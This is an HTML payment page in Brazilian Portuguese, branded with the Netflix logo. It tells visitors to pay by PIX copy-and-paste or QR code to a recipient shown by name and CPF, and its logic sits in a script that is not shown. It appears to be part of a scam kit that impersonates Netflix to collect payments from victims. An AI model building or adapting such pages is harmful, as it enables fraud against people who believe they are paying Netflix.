<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Página de Pagamento</title>
    <link rel="icon" href="/assets/icons/nficon2023.ico" type="image/x-icon"> 
    <link rel="stylesheet" href="/assets/css/gerar.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
</head>
<body>
    <header class="header">
        <img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Netflix_2015_logo.svg" alt="Netflix Logo">
    </header>
    <div class="container">
        <header class="headeres">
            <h1>Detalhes do Pagamento</h1>
        </header>
        <div class="payment-details">
            <p><strong>DESTINATÁRIO:</strong> <span id="nomeDoc2"></span></p>
            <p><strong>CPF:</strong> <span id="numeroDoc2"></span></p>
            <p><strong>PIX gerado com sucesso!</strong></p>
            <div class="payment-info">
                <p><strong>Siga as instruções para realizar o pagamento:</strong></p>
                <p>1- Copie o código abaixo:</p>
                <input type="text" id="pix-code" readonly>
                <button id="copy-code-btn">COPIAR CÓDIGO</button>
                <p>2- Cole no seu banco na função <strong>PIX Copia e Cola</strong></p>
                <p><strong>Você também pode pagar utilizando o QR Code:</strong></p>
                <div class="qrcode-container">
                    <div id="qrcode"></div>
                </div>
                <p>1 - Acesse sua conta bancária no internet banking ou através do app.</p>
                <p>2 - Selecione a opção de pagar com PIX / escanear QR Code.</p>
                <p>3 - Finalize o pagamento.</p>
            </div>
        </div>
        <footer class="footer">
            <button id="continue-btn" class="continue-button">Voltar ao Início</button>
        </footer>
    </div>

    <script>

    </script>
     <script src="/assets/js/script.js"></script>
</body>
</html>
